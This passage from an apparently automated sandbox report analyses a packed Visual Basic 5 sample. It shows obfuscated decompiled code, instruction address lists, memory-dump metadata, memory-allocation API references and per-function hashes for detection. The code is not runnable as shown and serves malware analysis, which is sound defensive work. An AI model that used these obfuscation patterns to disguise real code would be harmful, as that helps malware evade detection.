																			asm("sbb [edi+0x13], ecx");
																			L38:
																			asm("adc ecx, [esi+edx]");
																			goto L39;
																		}
																	}
																} else {
																	_t68 = _t83 & 0x324f6c2e;
																	goto L15;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				asm("adc [edi+0x31], ecx");
				asm("adc [ecx], dl");
				_t72 = _t69 - 0x0000002c + 0x0000004f ^ 0x274f0d33;
				asm("daa");
				asm("sbb cl, [edi+0x3d]");
				_t119 = _t118 -  *_t72;
				asm("adc al, 0x4f");
				_t74 = _t72 - 0x2d05284f &  *0xf224f2b;
				asm("daa");
				 *_t119 =  *_t119 & _t74;
				 *[ds:ebx] =  *[ds:ebx] | _t191;
				_t138 = _t132 - 0xfffffffffffffffc;
				_t139 = _t138 - 1;
				asm("adc al, 0x2d");
				asm("aaa");
				asm("sbb al, 0x25");
				_t108 = (_t102 -  *0xc244f2e -  *((intOrPtr*)(_t138 + 0x3c)) ^  *_t119) &  *(_t139 + 0x3c) &  *(_t139 + 0x22) &  *_t95;
				asm("sbb edi, [ebx]");
				 *[es:ecx] =  *[es:ecx] - _t108;
				 *0x2a394f2e =  *0x2a394f2e ^ _t196;
				_t78 = ((_t74 | 0x00000021) + 0x02354f24 ^ 0x00000008) & 0x2127394f;
				_t145 = _t139 - 0xfffffffffffffffc;
				 *0x36364f24 =  *0x36364f24 ^ _t196;
				_t109 = _t108 - _t145[0xd];
				asm("retf");
				asm("pushad");
				_t147 = _t145;
				asm("int 0x37");
				if(_t147 <= 0) {
					L46:
					asm("rol eax, 0x36");
					_t149 = _t147;
					asm("rcr dh, 0x3d");
					L47:
					asm("fidivr word [0x38d7d84f]");
					asm("out dx, eax");
					 *_t109 =  *_t109 >> 1;
					_t151 = _t149;
					L45:
					asm("fcmovu st0, st4");
					_pop(ss);
					_t147 = _t151 - 0xffffffffffffffff;
					asm("ffreep st0");
					_t109 = _t109 -  *((intOrPtr*)(_t147 - 0x25));
					 *_t147 =  *_t147 << 0x4f;
					asm("fstp1 st2");
					 *((intOrPtr*)(_t147 - 0x3f)) =  *((intOrPtr*)(_t147 - 0x3f)) - _t109;
					goto L46;
				}
				asm("int 0x4");
				_t79 = _t78 ^ 0x0000004f;
				asm("invalid");
				_t154 = _t147 - 1;
				asm("fist word [ebx]");
				_t110 = _t109 ^  *(_t154 - 0x36);
				asm("iretd");
				 *_t95 =  *_t95 ^ _t110;
				asm("daa");
				asm("daa");
				_t112 = _t110 -  *(_t154 - 0x36) ^  *(_t154 - 0x3c);
				 *(_t154 + 0x30) =  *(_t154 + 0x30) | _t112;
				asm("into");
				_t109 = _t112 &  *(_t154 - 0x3d);
				asm("retf");
				if(_t109 < 0) {
					goto L49;
				} else {
					asm("invalid");
					_t151 = _t154 - 1;
					asm("enter 0x17ca, 0x4f");
					asm("ffreep st5");
					asm("sbb al, 0x4f");
					goto L45;
				}
				while(1) {
					L49:
					_t155 = _t154 - 1;
					asm("invalid");
					 *(_t155 + 0x28) =  *(_t155 + 0x28) ^ _t109;
					_push(_t109);
					asm("int3");
					_t149 = _t155 - 1;
					_t80 = _t79 & 0x0000006e;
					asm("enter 0x3c4f, 0x67");
					asm("lds ecx, [edi+0x35]");
					if(_t80 != 0) {
						goto L47;
					}
					_t154 = _t149 - 1;
					_t79 = _t80 ^ 0x324fde63;
					if(_t79 != 0) {
						 *(_t154 - 7) =  *(_t154 - 7) ^ _t109;
						asm("stc");
						continue;
					}
					asm("int 0x71");
					asm("ror byte [edi-0x36], 0x77");
					asm("fimul dword [edi-0x21]");
					asm("fbstp tword [eax-0x2d]");
				}
				goto L47;
			}

0x00401144
0x00401149
0x0040114e
0x00401150
0x00401152
0x00401154
0x00401156
0x00401158
0x00401159
0x0040115b
0x0040115d
0x0040115f
0x00401165
0x00401171
0x00401173
0x00401175
0x00401177
0x00401179
0x0040117b
0x0040117d
0x0040117f
0x00401183
0x00401186
0x00401188
0x0040118c
0x00401190
0x00401192
0x00401194
0x00401196
0x00401198
0x0040119e
0x004011a3
0x004011a9
0x004011ae
0x004011b0
0x004011b1
0x004011b4
0x004011bd
0x004011be
0x004011c0
0x004011c6
0x004011c7
0x004011cd
0x004011cf
0x004011d1
0x004011d3
0x004011d5
0x004011d7
0x004011d9
0x004011db
0x004011dd
0x004011df
0x004011e1
0x004011e3
0x004011e5
0x004011e7
0x004011e9
0x004011eb
0x004011ed
0x004011ef
0x004011f4
0x004011f6
0x004011f8
0x004011fa
0x004011fe
0x004011ff
0x00401201
0x00401202
0x00401203
0x00401209
0x0040120b
0x0040120d
0x0040120e
0x0040120f
0x00401210
0x00401211
0x00401213
0x00401214
0x00401216
0x00401217
0x00401219
0x0040121c
0x0040121e
0x00401221
0x00401227
0x00401228
0x0040122a
0x0040122c
0x0040122e
0x0040122f
0x00401231
0x00401233
0x00401235
0x00401237
0x0040123d
0x0040123f
0x00401241
0x00401243
0x00401245
0x00401247
0x0040124d
0x00401250
0x00401252
0x00401254
0x00401256
0x0040125d
0x0040125e
0x00401260
0x00401262
0x00401264
0x00401266
0x0040126a
0x0040126c
0x0040126d
0x00401272
0x00401274
0x00401276
0x0040127a
0x0040127c
0x00401280
0x00401282
0x00401284
0x00401286
0x00401288
0x0040128d
0x0040128e
0x00401290
0x00401292
0x00401294
0x00401296
0x00401298
0x00401299
0x0040129b
0x0040129d
0x0040129f
0x004012a1
0x004012a3
0x004012a5
0x004012a7
0x004012a9
0x004012ab
0x004012ad
0x004012af
0x004012b1
0x004012b3
0x004012b5
0x004012b7
0x004012c1
0x004012c2
0x004012c4
0x004012c6
0x004012c8
0x004012c9
0x004012ca
0x004012cb
0x004012cc
0x004012d1
0x00401328
0x00401328
0x00401328
0x0040132a
0x00000000
0x0040132c
0x0040132c
0x0040132d
0x0040132e
0x00000000
0x00401330
0x00401330
0x00401331
0x00000000
0x00401334
0x0040132e
0x004012d3
0x004012d3
0x004012d3
0x004012d4
0x00401326
0x00401326
0x00000000
0x004012d6
0x004012d6
0x00401327
0x00401327
0x00000000
0x004012d8
0x004012d8
0x004012dd
0x004012de
0x004012e0
0x0040135c
0x0040135c
0x0040135e
0x00000000
0x004012e2
0x004012e2
0x004012e2
0x004012e4
0x00401352
0x00401352
0x00401355
0x00401356
0x00401359
0x00000000
0x004012e6
0x004012e6
0x00401337
0x00401337
0x00401338
0x00401339
0x00000000
0x004012e8
0x004012e8
0x0040135f
0x0040135f
0x00401360
0x00000000
0x004012ea
0x004012ea
0x0040133b
0x0040133b
0x0040133c
0x0040133d
0x0040133e
0x00401341
0x00401343
0x00401343
0x00401344
0x00401345
0x00401347
0x00401348
0x00401348
0x00401349
0x00401349
0x0040134d
0x0040134f
0x00401350
0x00000000
0x00401350
0x00000000
0x004012ec
0x004012ec
0x004012ed
0x00000000
0x004012ef
0x004012ef
0x004012f0
0x004012f4
0x004012f9
0x0040136d
0x0040136d
0x00000000
0x00000000
0x00000000
0x00000000
0x004012fb
0x004012fc
0x00401300
0x00401301
0x00401302
0x00401304
0x00401306
0x00401308
0x0040130a
0x0040130c
0x0040130c
0x0040130e
0x00000000
0x00401310
0x00401310
0x00401312
0x00401363
0x00401364
0x00401365
0x00401368
0x0040136a
0x0040136a
0x0040136a
0x00000000
0x00401314
0x00401314
0x00401318
0x0040131b
0x0040131c
0x0040131e
0x0040136f
0x0040136f
0x00401370
0x0040139e
0x004013a0
0x004013a2
0x004013a5
0x004013ad
0x004013b1
0x004013b2
0x004013b7
0x004013b8
0x00401373
0x00401374
0x00401377
0x00401378
0x00401379
0x0040137b
0x0040137b
0x0040137c
0x0040137d
0x0040137f
0x0040137f
0x00401380
0x00401385
0x00401387
0x0040138e
0x00401391
0x00401394
0x00401395
0x00401397
0x00401398
0x00401399
0x0040139a
0x0040139c
0x0040139c
0x00000000
0x0040139c
0x00401385
0x00401320
0x00401320
0x00000000
0x00401325
0x0040131e
0x00401312
0x0040130e
0x004012f9
0x004012ed
0x004012ea
0x004012e8
0x004012e6
0x004012e4
0x004012e0
0x004012d6
0x004012d4
0x004013ba
0x004013bd
0x004013c4
0x004013c9
0x004013ca
0x004013cd
0x004013d2
0x004013e0
0x004013e6
0x004013e8
0x004013ec
0x004013ef
0x004013f7
0x00401405
0x00401408
0x00401409
0x0040140c
0x00401415
0x00401418
0x0040141c
0x00401422
0x00401427
0x00401428
0x0040142e
0x00401434
0x00401435
0x00401437
0x00401438
0x0040143a
0x0040148b
0x0040148c
0x0040148f
0x00401490
0x00401491
0x00401491
0x00401498
0x00401499
0x0040149b
0x00401477
0x00401478
0x0040147a
0x0040147f
0x00401480
0x00401482
0x00401485
0x00401488
0x0040148a
0x00000000
0x0040148a
0x0040143c
0x0040143e
0x00401440
0x00401443
0x00401444
0x00401446
0x0040144c
0x0040144d
0x00401451
0x00401455
0x00401456
0x0040145e
0x00401461
0x00401462
0x00401465
0x00401466
0x00000000
0x00401468
0x00401468
0x0040146f
0x00401470
0x00401474
0x00401476
0x00000000
0x00401476
0x004014b7
0x004014b7
0x004014b7
0x004014b8
0x004014ba
0x004014bd
0x004014be
0x004014bf
0x004014c0
0x004014c2
0x004014c6
0x004014c9
0x00000000
0x00000000
0x004014cb
0x004014cc
0x004014d1
0x004014b2
0x004014b5
0x00000000
0x004014b6
0x004014d4
0x004014d6
0x004014da
0x004014dc
0x004014dc
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401149

Strings

VB5!6&*, xrefs: 00401144

Memory Dump Source

Source File: 00000006.00000002.2350801962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2350797843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2350812773.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2350816812.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: f7f0828d82d24344c24e667637b7ee2946cc307b89bd8ee84dc4efd9063d70f6
Instruction ID: 897156f5bccbea118947c71d059ed2fd519cf5942bc0f0e3fc105f14373928e3
Opcode Fuzzy Hash: f7f0828d82d24344c24e667637b7ee2946cc307b89bd8ee84dc4efd9063d70f6
Instruction Fuzzy Hash: 1A11CA5604F3C64FC30B8B718C656917FB0AE13659B0A02EBD9C2CE4E7D619099AC772

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003B0BDC, Relevance: 6.9, Strings: 5, Instructions: 636COMMON

Download Yara Rule

Strings

7_D, xrefs: 003B0F96
>oU, xrefs: 003B0F0E
b#ao, xrefs: 003B1251
Vk, xrefs: 003B12D0
*D,[, xrefs: 003B1628

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: *D,[$7_D$Vk$b#ao$>oU
API String ID: 2167126740-2613622489
Opcode ID: 7d22a617759d878bf1742af363549b738686426a49a6d1fc76e1f7072c65d4bb
Instruction ID: 243a71f7a256ba6cf45978831ba02085be570fb9b6d45ca4073711a7f80dc38e
Opcode Fuzzy Hash: 7d22a617759d878bf1742af363549b738686426a49a6d1fc76e1f7072c65d4bb
Instruction Fuzzy Hash: 59426571A043858FDB399F38CC597EE3BA2AF49314F46412EDD8D9BA51D7318981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B0B59, Relevance: 6.7, Strings: 5, Instructions: 437COMMON

Download Yara Rule

Strings

7_D, xrefs: 003B0F96
^, xrefs: 003B0B54, 003B0BCD
>oU, xrefs: 003B0F0E
b#ao, xrefs: 003B1251
Vk, xrefs: 003B12D0

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 7_D$Vk$b#ao$>oU$^
API String ID: 2167126740-147858774
Opcode ID: 280948abde40cb725b023d77b65736f383a6c48d32d70a09d1ea190c0f81498b
Instruction ID: 390902438e252af2f236881b657ca82d1f48268e7c4a6d68d98c32b5b2287a16
Opcode Fuzzy Hash: 280948abde40cb725b023d77b65736f383a6c48d32d70a09d1ea190c0f81498b
Instruction Fuzzy Hash: 57022371A082898FDF799F38CC557EE3BA2AF49314F45412EDD8E9BA44C7354A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B0CFA, Relevance: 5.4, Strings: 4, Instructions: 399COMMON

Download Yara Rule

Strings

7_D, xrefs: 003B0F96
>oU, xrefs: 003B0F0E
b#ao, xrefs: 003B1251
Vk, xrefs: 003B12D0

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7_D$Vk$b#ao$>oU
API String ID: 0-3891533994
Opcode ID: f63411aba9187d809a0247caf7f66c21c79f4f4213279f956d57207e6dafb9be
Instruction ID: 78466ea2d8e66f1c5e157cb5a6809ebbde6177a3f2cc1c2268d518efbff2243e
Opcode Fuzzy Hash: f63411aba9187d809a0247caf7f66c21c79f4f4213279f956d57207e6dafb9be
Instruction Fuzzy Hash: C4F11371A082898FDF799F38CC557EE3BA2AF49314F85412EDD8D9BA44C7354A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B0DD5, Relevance: 5.4, Strings: 4, Instructions: 359COMMON

Download Yara Rule

Strings

7_D, xrefs: 003B0F96
>oU, xrefs: 003B0F0E
b#ao, xrefs: 003B1251
Vk, xrefs: 003B12D0

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7_D$Vk$b#ao$>oU
API String ID: 0-3891533994
Opcode ID: 9dd2a59d18d586fdc7786bc758f616dfaf12e26e0966a4a8a3912dce5d29e1c9
Instruction ID: 1a8730c6dba6fde8870989d34b9934ef60ab48ad1e1ac5a37f3f5c701ccd40a2
Opcode Fuzzy Hash: 9dd2a59d18d586fdc7786bc758f616dfaf12e26e0966a4a8a3912dce5d29e1c9
Instruction Fuzzy Hash: 11E14331A08385CFDB399F38C8457EE7BA2AF55314F86421EDD8E9BA54C7358981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B0ED2, Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

7_D, xrefs: 003B0F96
>oU, xrefs: 003B0F0E
b#ao, xrefs: 003B1251
Vk, xrefs: 003B12D0

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7_D$Vk$b#ao$>oU
API String ID: 0-3891533994
Opcode ID: ab005d9b50fdaeda949c15355d2a079ad5b1618611aacea372105dcc19c2b48c
Instruction ID: 8d8eabd95efffc66e0aba14278753600235beba1bf5a08c803798d90baf04eb1
Opcode Fuzzy Hash: ab005d9b50fdaeda949c15355d2a079ad5b1618611aacea372105dcc19c2b48c
Instruction Fuzzy Hash: E9C12271A08385CBDF799F3888457DE7BA2AF59310F86421EDD8D9BA84C7358941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B2873, Relevance: 3.5, Strings: 2, Instructions: 983COMMON

Download Yara Rule

Strings

}W31, xrefs: 003B4DD7
`~vG, xrefs: 003B4FB1

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `~vG$}W31
API String ID: 0-4278674903
Opcode ID: 7dbdb606efaecdd0f2469e608fc948e617a90887d687998abe2866bc757f0812
Instruction ID: a1b1cf34b0ae16cdbc49110241da8bde444f2fcf9da80c15081116ff896e74ce
Opcode Fuzzy Hash: 7dbdb606efaecdd0f2469e608fc948e617a90887d687998abe2866bc757f0812
Instruction Fuzzy Hash: 4E920EB26043899FDB749F78CD857DA7BA2FF58340F56412AED899B610D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B7A7A, Relevance: 3.2, Strings: 2, Instructions: 650COMMON

Download Yara Rule

Strings

}W31, xrefs: 003B4DD7
`~vG, xrefs: 003B4FB1

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `~vG$}W31
API String ID: 0-4278674903
Opcode ID: bad7d08c3ee245bcbcc24156b36c8cba69cb4b3ccc14614b782dd11a97c8b9fc
Instruction ID: 16b9a55d32964163fb5e724237282ea10dd4bf8f15047c21310fa6103d65b3ad
Opcode Fuzzy Hash: bad7d08c3ee245bcbcc24156b36c8cba69cb4b3ccc14614b782dd11a97c8b9fc
Instruction Fuzzy Hash: 4352ECB2604389DFDB758F28CD85BDABBB2FF54340F56412ADD899B610D3349A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B443A, Relevance: 3.1, Strings: 2, Instructions: 633COMMON

Download Yara Rule

Strings

}W31, xrefs: 003B4DD7
`~vG, xrefs: 003B4FB1

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `~vG$}W31
API String ID: 0-4278674903
Opcode ID: bc5e0bf1bda241e8ba8462a8369d8269dbbb86872499976e756c2a3454c1fd15
Instruction ID: 33506e11e57eeb01438a72935e0d96f1499b849f9b7041b6d4419ffa11c2d93b
Opcode Fuzzy Hash: bc5e0bf1bda241e8ba8462a8369d8269dbbb86872499976e756c2a3454c1fd15
Instruction Fuzzy Hash: 2052ECB2604389DFDB748F28CD85BDABBB2FF54340F56412ADD899B610D3349A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B05A1, Relevance: 2.8, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

^, xrefs: 003B0B54
^=b, xrefs: 003B0AB9

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^=b$^
API String ID: 0-3094246518
Opcode ID: deaf2557a27b36bc94b8274b818d3191b54155084386dfae5ec306bb7f2c4d4d
Instruction ID: 6e1e6398e2363deab13525e3dd19ef58b1a6ddb6e1a6424b3daa3824fdee0a9d
Opcode Fuzzy Hash: deaf2557a27b36bc94b8274b818d3191b54155084386dfae5ec306bb7f2c4d4d
Instruction Fuzzy Hash: 78B12472604348CFDB34DF79CC807DA77A2EF99354F56442AED89AB611D7308E818B46

Uniqueness

Uniqueness Score: -1.00%

Function 003B5781, Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

^, xrefs: 003B0B54
^=b, xrefs: 003B0AB9

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^=b$^
API String ID: 0-3094246518
Opcode ID: 058624cc0189bbd7e4c56df21123679dec006719bdb6b9ae1e1a7a6ad0a68401
Instruction ID: 937230abb88747d580aafb1af4ef3e2a96a9716216824b1a9c3573c3461b5c5b
Opcode Fuzzy Hash: 058624cc0189bbd7e4c56df21123679dec006719bdb6b9ae1e1a7a6ad0a68401
Instruction Fuzzy Hash: 10B12372904344DFDB249F35CC807EBB7A2EF98354F56442AED89AB615D7708E818B42

Uniqueness

Uniqueness Score: -1.00%

Function 003B0211, Relevance: 2.8, Strings: 2, Instructions: 259COMMON

Download Yara Rule

Strings

^, xrefs: 003B0B54
^=b, xrefs: 003B0AB9

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^=b$^
API String ID: 0-3094246518
Opcode ID: 961a2d9f6a6579fe8d9cff2c3e3f27d330cd04cbdbe2e402388aa3fbf9b29e8c
Instruction ID: b4adbf81064b09f541ce385378642c3d1458644113b68df343c82790ec5338ca
Opcode Fuzzy Hash: 961a2d9f6a6579fe8d9cff2c3e3f27d330cd04cbdbe2e402388aa3fbf9b29e8c
Instruction Fuzzy Hash: E6A15772604344DFDB25AF74CC817EF77A2EF98314F16442AEE89AB615C7308E828B41

Uniqueness

Uniqueness Score: -1.00%

Function 003B4DB6, Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

}W31, xrefs: 003B4DD7
`~vG, xrefs: 003B4FB1

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `~vG$}W31
API String ID: 0-4278674903
Opcode ID: dc2ee1fa3613c0033070e5dd20e0d7fd31854d792063ffe4b79069b18bffd051
Instruction ID: 77b4ea78a3f5692b2f3920e32e5d3c850ce6c62981e6fa2566b621f0a306230c
Opcode Fuzzy Hash: dc2ee1fa3613c0033070e5dd20e0d7fd31854d792063ffe4b79069b18bffd051
Instruction Fuzzy Hash: CFB1EDB6640388DFDF758F68DC85BDA3BA2BF58340F45412AED8D8B650D7708A848F41

Uniqueness

Uniqueness Score: -1.00%

Function 003B5D78, Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

G(J, xrefs: 003B60ED

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: G(J
API String ID: 2167126740-847150595
Opcode ID: 02fa72410816c3f1408772e731ef643bf826d782703a826cea2e7961c4c21f2b
Instruction ID: 2a66b2608dc2d20fac76e8a6b9735fd5dc3ce1c85a36825107e655d1798b70d7
Opcode Fuzzy Hash: 02fa72410816c3f1408772e731ef643bf826d782703a826cea2e7961c4c21f2b
Instruction Fuzzy Hash: 5DC1DB7160438A9FCB75AF38D955BEE7BA1FF48350F42442DEE89AB611D3308A40CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003B7E5C, Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

HyuA, xrefs: 003B7EC6

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: HyuA
API String ID: 0-2002190500
Opcode ID: 357ea02670d2617d2e23eff69a58288935f1764217c0474b24886776f9703e0e
Instruction ID: 920ac24ae46cbafa509bfb8ed5d5768ee4d2c2c0973fd315d60d52bc21f835e8
Opcode Fuzzy Hash: 357ea02670d2617d2e23eff69a58288935f1764217c0474b24886776f9703e0e
Instruction Fuzzy Hash: 90810272A042599BDB35CE28C8957EA77A6AF88304F45412EDD0A9BB40DB309E81CB95

Uniqueness

Uniqueness Score: -1.00%

Function 003B3CF2, Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

@EAa, xrefs: 003B3E14

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @EAa
API String ID: 0-534177664
Opcode ID: bebc784fe25d7a59788192a24dad418890df63f69fbf34c826860e3b20986b7c
Instruction ID: 4ba7f51407ded7e7b5cc42d5623e57bf5fed0861222d102b9fbd3f9af9b66f67
Opcode Fuzzy Hash: bebc784fe25d7a59788192a24dad418890df63f69fbf34c826860e3b20986b7c
Instruction Fuzzy Hash: 5D510CB0600388DFD768CF29D8987CABBA0FF1A360F148269C859CF261D7709A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003B3CEF, Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

@EAa, xrefs: 003B3E14

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @EAa
API String ID: 0-534177664
Opcode ID: f8dfa1c7380c3a607f374aafd8ec8a59c20149095fa84d831f405997bf456b30
Instruction ID: 98132ac775ce56ea70b2775589fa2df269f418e6071e4fb9be0bbdb8216c597b
Opcode Fuzzy Hash: f8dfa1c7380c3a607f374aafd8ec8a59c20149095fa84d831f405997bf456b30
Instruction Fuzzy Hash: 6841DDB56002889FDBB9CF28C9987CA7BA5FF09394F44812AD949CF625D7709B40CF91

Uniqueness

Uniqueness Score: -1.00%

Function 003B853B, Relevance: .7, Instructions: 696COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: badc7194156f3a5bfd1f112055c5712277dfc906ff09fcbcfc9a052c240d7f1d
Instruction ID: 5000660b839c33173e610e3b9c66e1b8724afa854d4349e7629ca7af999d6368
Opcode Fuzzy Hash: badc7194156f3a5bfd1f112055c5712277dfc906ff09fcbcfc9a052c240d7f1d
Instruction Fuzzy Hash: A85226715083858FDF36CF38C8987DABBE2AF56314F49816ACC998F696D7308945CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003B2D3B, Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3568c3b45448841e2bd9a4a130c370bbe1b9835c981409a4cc035b55c2e37678
Instruction ID: ca8a47acca1a3f93db19ee84319512a9d525d92a3b1afdaa43ec8dd485037fef
Opcode Fuzzy Hash: 3568c3b45448841e2bd9a4a130c370bbe1b9835c981409a4cc035b55c2e37678
Instruction Fuzzy Hash: 91229871A043599FDB69CF28C881BEAB7E5FF49350F45422AED9DDB701D730AA408B90

Uniqueness

Uniqueness Score: -1.00%

Function 003B85E7, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d42cda8d890c161df6133b8b63ac57525b88c41c7aff055999cf532d2ae868
Instruction ID: 99a4c8b5fd42f48b43e49ce58fef3f7af234bae0f3c95f84120033de5c8a9e78
Opcode Fuzzy Hash: 32d42cda8d890c161df6133b8b63ac57525b88c41c7aff055999cf532d2ae868
Instruction Fuzzy Hash: 1AB1E1615083C58EDB36CF38C8987D67FE2AF13364F4A82AAC8998F6D6D7348505C716

Uniqueness

Uniqueness Score: -1.00%

Function 003B86DB, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a9e8a19f72cd1f48c93bc0fe0b2c1c87dd375362c33e2adc05b6407b5a9028
Instruction ID: 80ca18348a3cb48f1690a365effd90e807c39d76c89019932af7378c14d1cdbe
Opcode Fuzzy Hash: 70a9e8a19f72cd1f48c93bc0fe0b2c1c87dd375362c33e2adc05b6407b5a9028
Instruction Fuzzy Hash: 7991D1715083C58ADF36CF38C8987EA7BE2AF12354F4AC1AACC898F696D7348545C716

Uniqueness

Uniqueness Score: -1.00%

Function 003B86F4, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d152c6b1d3714421e75616208b7cd777573d2a0128bdcbd6f84df866b441e9c3
Instruction ID: 26311c9414b814f22372cb0b64769075f805243f71eda7bb63a175b9e8493caa
Opcode Fuzzy Hash: d152c6b1d3714421e75616208b7cd777573d2a0128bdcbd6f84df866b441e9c3
Instruction Fuzzy Hash: CA91F4715083C58ADF36CF38C8987EA7FE2AF12354F4982AACC998F696D7348545C712

Uniqueness

Uniqueness Score: -1.00%

Function 003B2FD3, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d78ff428987fee85755337f898de08400f705c3150fc45985f007e99f860d8
Instruction ID: 8bee4a1fbd2a45ea9b667b3b996ada6cef0dcc1a4f70398800287c7bbef3f31d
Opcode Fuzzy Hash: 69d78ff428987fee85755337f898de08400f705c3150fc45985f007e99f860d8
Instruction Fuzzy Hash: BE819C756043598FDB69CF28C981BEAB7E1FF08310F15422AED5DDB601DB71AA10CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003B8802, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54cc7a59c8ec043e5e694acadb6420223f3d26dc749ec3e5e451cdc85efd7ac
Instruction ID: 96bd90738419dc11355f6c9925c58dbf692c11b681ec6d7b59ddf9c1e9e8b35f
Opcode Fuzzy Hash: c54cc7a59c8ec043e5e694acadb6420223f3d26dc749ec3e5e451cdc85efd7ac
Instruction Fuzzy Hash: 6581D6715083858BDF3ACF38CC987EA7BE1AF12354F4981AACC999F28AD7348505C712

Uniqueness

Uniqueness Score: -1.00%

Function 003B94D8, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

